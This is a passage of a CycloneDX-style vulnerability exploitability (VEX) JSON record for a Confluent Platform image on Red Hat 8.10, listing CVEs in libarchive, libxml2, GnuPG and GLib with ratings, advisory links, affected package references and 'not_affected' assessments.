          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-25724",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.8,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.8,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        252
      ],
      "description": "list_item_verbose in tar/util.c in libarchive through 3.7.7 does not check an strftime return value, which can lead to a denial of service or unspecified other impact via a crafted TAR archive that is read with a verbose value of 2. For example, the 100-byte buffer may not be sufficient for a custom locale.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-25724"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:9431"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-25724"
        },
        {
          "url": "https://bugzilla.redhat.com/2349221"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2349221"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-25724"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2025-9431.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2025:9431"
        },
        {
          "url": "https://gist.github.com/Ekkosun/a83870ce7f3b7813b9b462a395e8ad92"
        },
        {
          "url": "https://github.com/Ekkosun/pocs/blob/main/bsdtarbug"
        },
        {
          "url": "https://github.com/advisories/GHSA-722w-734r-qg74"
        },
        {
          "url": "https://github.com/libarchive/libarchive/blob/b439d586f53911c84be5e380445a8a259e19114c/tar/util.c#L751-L752"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-25724.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2025-9431.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-25724"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7454-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8147-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-25724"
        }
      ],
      "published": "2025-03-02T02:15:36+00:00",
      "updated": "2026-06-17T09:01:02+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.3.3-7.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-27113",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "bitnami"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.1,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        476
      ],
      "description": "libxml2 before 2.12.10 and 2.13.x before 2.13.6 has a NULL pointer dereference in xmlPatMatch in pattern.c.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-27113"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/10"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/11"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/12"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/13"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/4"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/5"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/8"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/9"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-27113"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/861"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2025/02/msg00028.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27113"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250306-0004/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7302-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-27113"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2025/02/18/2"
        }
      ],
      "published": "2025-02-18T23:15:10+00:00",
      "updated": "2026-06-17T09:03:03+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.9.7-21.el8_10.6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-30258",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        754
      ],
      "description": "In GnuPG before 2.5.5, if a user chooses to import a certificate with certain crafted subkey data that lacks a valid backsig or that has incorrect usage flags, the user loses the ability to verify signatures made from certain other signing keys, aka a \"verification DoS.\"",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-30258"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-30258"
        },
        {
          "url": "https://dev.gnupg.org/T7527"
        },
        {
          "url": "https://dev.gnupg.org/rG48978ccb4e20866472ef18436a32744350a65158"
        },
        {
          "url": "https://lists.gnupg.org/pipermail/gnupg-announce/2025q1/000491.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30258"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7412-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7412-3"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-30258"
        }
      ],
      "published": "2025-03-19T20:15:20+00:00",
      "updated": "2026-06-17T09:08:24+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.2.20-4.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-3360",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        190
      ],
      "description": "A flaw was found in GLib. An integer overflow and buffer under-read occur when parsing a long invalid ISO 8601 timestamp with the g_date_time_new_from_iso8601() function.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-3360"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-3360"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2357754"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3647"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/work_items/3647"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2025/04/msg00024.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-3360"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7942-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7942-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-3360"
        }
      ],
      "published": "2025-04-07T13:15:43+00:00",
      "updated": "2026-06-30T15:16:50+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.56.4-170.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
